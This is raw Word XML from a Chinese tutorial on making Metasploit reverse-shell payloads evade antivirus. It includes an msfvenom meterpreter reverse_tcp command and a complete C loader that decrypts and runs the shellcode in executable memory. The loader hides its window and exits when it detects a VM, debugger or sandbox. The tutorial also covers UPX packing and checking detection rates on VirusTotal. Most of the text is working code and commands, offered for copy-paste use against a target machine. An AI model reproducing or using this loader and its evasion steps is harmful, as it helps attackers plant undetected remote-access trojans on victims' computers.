        <w:t>：指定加密算法为XOR（简单、高效，不易被查杀，适合入门）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38183E91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--encrypt-key "msf2025"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：自定义加密密钥（可修改为任意复杂字符串，密钥越复杂，加密效果越好，解密时需与加载器中的密钥一致）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6470731A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-f raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：输出为Raw格式（纯机器码，无文件头，便于后续嵌入加载器）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC0D5D1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-i 15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：15次编码，配合加密，进一步破坏静态特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E15C165">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>步骤2：生成Shellcode的十六进制格式（用于嵌入加载器）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="26C6C5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Raw格式的shellcode.raw无法直接嵌入C语言代码，需转换为十六进制数组，执行以下命令：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5BA629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E2FAC9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xxd -i shellcode.raw &gt; shellcode.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E50C8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注释：执行后，会生成shellcode.h文件，打开该文件，里面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shellcode[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数组，就是我们需要嵌入加载器的加密Shellcode（复制该数组即可）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFC5E1D">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>步骤3：编写C语言加载器（完整代码，可直接复制，含反沙箱基础代码）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="7F170E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创建loader.c文件（Kali中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nano loader.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，粘贴以下代码，保存退出），代码含详细注释，无需修改，仅需替换Shellcode数组：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14BF65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7C8937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c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#include &lt;windows.h&gt;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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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替换为shellcode.h文件中的shellcode数组（复制全部内容，替换下面的示例数组）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示例数组（仅作参考，需替换为自己生成的shellcode）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unsigned char shellcode[] =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0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,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0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,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0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,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0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,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0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,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0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,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0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,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0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,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0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,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0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,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0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,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0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,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0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,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0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,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0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,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0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,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0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,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0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,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0x63,0x00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XOR解密函数（密钥必须与生成Shellcode时的--encrypt-key一致，此处为"msf2025"）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void xor_decrypt(unsigned char *data, size_t len, const char *key)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size_t key_len = strlen(key);  // 获取密钥长度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for (size_t i = 0; i &lt; len; i++)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data[i] ^= key[i % key_len];  // 循环异或解密，确保所有Shellcode都能解密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反沙箱检测（简单检测虚拟机，避免在沙箱中暴露恶意逻辑）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BOOL IsVM()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char buf[512];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HKEY hKey;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检测注册表中是否有VMware虚拟机的标识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if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", 0, KEY_READ, &amp;hKey) == ERROR_SUCCESS)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DWORD type, sz = sizeof(buf);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RegQueryValueExA(hKey, "Identifier", NULL, &amp;type, (LPBYTE)buf, &amp;sz);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RegCloseKey(hKey);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// 若注册表中包含"VMware"，说明在虚拟机（沙箱）中，返回真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return strstr(buf, "VMware") != NULL;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return FALSE;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主函数（程序入口）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int main()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1. 反沙箱检测：若在虚拟机/沙箱中，直接退出程序，避免被检测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if (IsVM()) { ExitProcess(0); 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2. 隐藏控制台窗口：运行后不显示黑窗口，降低靶机用户警惕性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HWND hWnd = GetConsoleWindow();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ShowWindow(hWnd, SW_HIDE);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3. 解密Shellcode（密钥与生成时一致，不可修改）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const char *key = "msf2025";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xor_decrypt(shellcode, sizeof(shellcode), key);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4. 申请可执行内存：为解密后的Shellcode申请内存，权限为"可执行、可读、可写"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LPVOID mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);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if (mem == NULL) return 1;  // 内存申请失败，退出程序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5. 复制Shellcode到申请的内存中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memcpy(mem, shellcode, sizeof(shellcode));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6. 执行Shellcode（触发反向连接，连接攻击机）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((void(*)())mem)();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return 0;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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="612D886A">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>步骤4：Kali中交叉编译加载器（生成exe文件，固定命令）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="72C45B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Kali中安装MinGW交叉编译器（用于将C语言代码编译为Windows可执行文件），然后编译加载器，命令如下：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6E06B24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A96550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1. 安装MinGW交叉编译器（仅首次安装需要）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sudo apt install mingw-w64 -y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2. 编译64位加载器（适配Win10/11，推荐，文件名：loader.exe）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x86_64-w64-mingw32-gcc loader.c -o loader.exe -s -w -O2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3. （可选）编译32位加载器（适配Win7及以下，文件名：loader32.exe）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i686-w64-mingw32-gcc loader.c -o loader32.exe -s -w -O2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FF8B6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参数注释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D92514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-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：剥离程序的符号表，减小文件体积，同时消除调试信息，避免被杀软识别为“可疑调试程序”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E79FB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-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：关闭编译警告，避免警告信息被杀软识别为异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB91386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-O2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：优化代码，混淆代码结构，进一步降低静态检测率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674FB5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注释：编译成功后，会生成loader.exe（64位），复制到靶机运行，即可后台回连攻击机，免杀率可达80%以上（需配合后续加壳，进一步提升）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA80D3">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3.4 进阶免杀3：加壳/虚拟化保护（绕过静态+部分动态检测，进一步提升免杀率）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="4108280E">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>原理详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="5E1C62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加壳的核心是“对编译后的exe文件进行二次加密、压缩、虚拟化”，改变文件的结构、代码段、导入表，让杀软无法解压、还原原始的加载器和Shellcode，从而绕过静态检测；同时，部分加壳工具（如VMProtect）会对代码进行虚拟化处理，让杀软无法分析程序的执行逻辑，规避动态检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169053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常用加壳工具对比（入门推荐）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0C1A4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UPX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：开源免费，操作简单，主要功能是压缩+简单加密，能快速改变文件结构，但由于使用广泛，易被杀软识别，建议配合编码+加载器使用（不单独使用）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376DDB61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Hyperion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：开源加密壳，比UPX更安全，支持AES加密，免杀效果更好，适合入门进阶。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695DA579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VMProtect/Themida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：商业加壳工具，虚拟化保护能力强，免杀效果极佳，但需要付费，适合专业场景。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE24F38">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>实战（UPX加壳，简单易操作，固定命令）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25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589F0AB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4D6E6F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1. 安装UPX（仅首次安装需要）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sudo apt install upx -y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2. 对loader.exe（64位加载器）进行加壳，生成加壳后的免杀木马（文件名：loader_upx.exe）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upx -9 loader.exe -o loader_upx.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48B041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参数注释：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表示最高压缩率，压缩率越高，文件体积越小，静态特征越难被识别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4033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注释：加壳后的loader_upx.exe，免杀率会进一步提升，可通过Virustotal（在线多引擎扫描）验证，检测率通常可控制在10%以下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B694527">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3.5 进阶免杀4：反沙箱/反调试（绕过动态检测，避免被沙箱拦截）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="79B39CA7">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>原理详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="207C3F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很多免杀失败的原因，不是木马本身被检测，而是木马在杀软的沙箱（虚拟环境）中运行时，暴露了恶意逻辑，被杀软捕捉到。反沙箱/反调试的核心是：在加载器中加入检测代码，判断程序是否在沙箱、虚拟机、调试器中运行，若是，则立即退出程序或执行正常逻辑，避免暴露恶意行为；若在真实环境中，则执行解密和Shellcode，实现回连。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E60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常用检测点（已在加载器中集成基础检测，可扩展）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EE7CF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检测调试器：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>IsDebuggerPresent()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>函数，判断是否有调试器附加（杀软常用调试器分析程序）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC1E12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检测虚拟机：通过注册表、CPU核心数、内存大小、磁盘序列号等，判断是否在VMware、VirtualBox等虚拟机中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E0DB3D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检测沙箱：通过检测系统进程（如沙箱进程）、文件路径、系统时间等，判断是否在沙箱环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14351AAD">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>加载器扩展反沙箱代码（可选，进一步提升免杀率）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="7E6066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在之前的loader.c中，已集成基础的虚拟机检测，可添加以下代码，增强反沙箱效果（添加在IsVM()函数之后、主函数之前）：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4FFAC28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4350F2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c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检测调试器（若有调试器附加，立即退出）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BOOL IsDebugger()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return IsDebuggerPresent();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检测CPU核心数（沙箱通常只有1-2个核心，真实机器一般≥4个）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BOOL IsSandbox()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SYSTEM_INFO si;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GetSystemInfo(&amp;si);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if (si.dwNumberOfProcessors &lt; 4)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return TRUE;  // 核心数&lt;4，判定为沙箱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return FALSE;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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0374C71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然后在主函数开头，添加检测逻辑：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7AB3A3D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CEBEA2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c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主函数开头添加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if (IsDebugger() || IsSandbox() || IsVM())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ExitProcess(0);  // 只要满足一个检测条件，立即退出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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CA711A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注释：添加后，重新编译加载器、加壳，可进一步规避沙箱检测，降低被动态拦截的概率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4EFF18">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>四、免杀效果验证（关键步骤，确保木马可用）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="305B56F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免杀不是“生成后就完事”，必须进行验证，确保在靶机中能正常运行、回连，且不被杀软查杀，推荐3种验证方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791827B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本地测试（最基础）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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EF7FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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靶机关闭杀软实时防护，运行木马（如loader_upx.exe），确认攻击机能正常获取Meterpreter会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB5BB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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开启靶机杀软，扫描木马文件，查看是否报毒；若报毒，需调整编码次数、密钥、加壳方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0008EB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在线多引擎扫描（最权威）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上传木马文件到</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.virustotal.com" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:color w:val="3370FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Virustotal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:color w:val="3370FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（免费在线多引擎扫描），查看检测率（目标：检测率&lt;10%，检测率越低，免杀效果越好）。注释：若检测率过高，可调整以下参数：增加编码次数（15-20次）、修改加密密钥、更换加壳工具（如用Hyperion替代UPX）、扩展反沙箱代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3396FA73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内存检测验证（深层验证）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靶机运行木马后，用杀软执行“内存扫描”，查看是否触发内存查杀；若被查杀，需优化加载器的内存执行逻辑（如增加Shellcode执行后的清理代码）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58226E99">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>五、完整免杀流程（最佳实践，一步到位）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="6487E6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整合以上所有步骤，形成完整的免杀流程，按顺序执行，可实现最佳免杀效果，适合新手操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A867B5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生成加密+多轮编码的Raw Shellcode（固定命令）：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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -e x86/shikata_ga_nai -i 15 --encrypt xor --encrypt-key "msf2025" -f raw -o shellcode.raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574542A6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转换Shellcode为十六进制数组：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>xxd -i shellcode.raw &gt; shellcode.h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4626E57F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编写含反沙箱/反调试的C加载器，嵌入十六进制Shellcode（复制shellcode.h中的数组）。（详细步骤如下，全程复制操作即可，无需手动编写代码）：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      ① 打开Kali终端，进入当前工作目录（与shellcode.h文件在同一目录，可执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确认目录，执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确认shellcode.h已存在）。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      ② 创建loader.c加载器文件，执行命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nano loader.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（nano是Kali默认文本编辑器，简单易操作，适合新手）。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      ③ 复制以下完整C语言加载器代码（含反沙箱、反调试、XOR解密功能，代码已写好所有逻辑，无需修改），粘贴到nano编辑器中：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#include &lt;windows.h&gt;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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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// 替换为shellcode.h文件中的shellcode数组（复制全部内容，替换下面的示例数组）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// 示例数组（仅作参考，需替换为自己生成的shellcode）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unsigned char shellcode[] = {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0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,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0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,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0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,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0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,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0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,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0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,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0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,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0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,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0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,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0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,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0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,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0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,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0